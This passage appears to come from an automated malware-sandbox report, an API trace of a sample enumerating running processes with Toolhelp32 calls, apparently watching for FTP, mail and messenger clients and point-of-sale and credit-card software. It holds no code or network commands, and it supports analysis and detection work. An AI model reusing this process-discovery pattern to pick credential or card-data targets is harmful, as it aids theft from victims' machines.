cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0256.206] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0256.208] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0256.210] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0256.212] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0256.244] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0256.251] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0256.254] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0256.256] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0256.259] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0256.261] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0256.326] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0256.328] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0256.330] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0256.333] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0256.335] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0256.337] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0256.340] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0256.346] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0256.348] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0256.350] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0256.353] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0256.355] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0256.360] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0256.363] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0256.365] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0256.367] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0256.370] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0256.399] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0256.401] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0256.408] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0256.410] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0256.412] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0256.414] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0256.417] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0256.422] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0256.424] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0256.427] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0256.429] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0256.431] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0256.433] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0256.439] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0256.441] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0256.443] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0256.445] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0256.448] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0256.701] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0256.704] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0256.720] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0256.722] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0256.724] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0256.726] CloseHandle (hObject=0x17b0) returned 1 [0256.726] Sleep (dwMilliseconds=0x64) [0256.867] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0256.909] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.911] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0256.912] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0256.914] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.916] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0256.917] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.922] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0256.924] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0256.925] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0256.927] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.929] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.931] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0256.932] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.050] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.052] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.054] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.056] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.058] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.062] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.064] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0257.066] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0257.068] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0257.070] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.072] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.074] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0257.078] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0257.079] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0257.081] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.083] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0257.085] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0257.088] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0257.090] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0257.338] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, 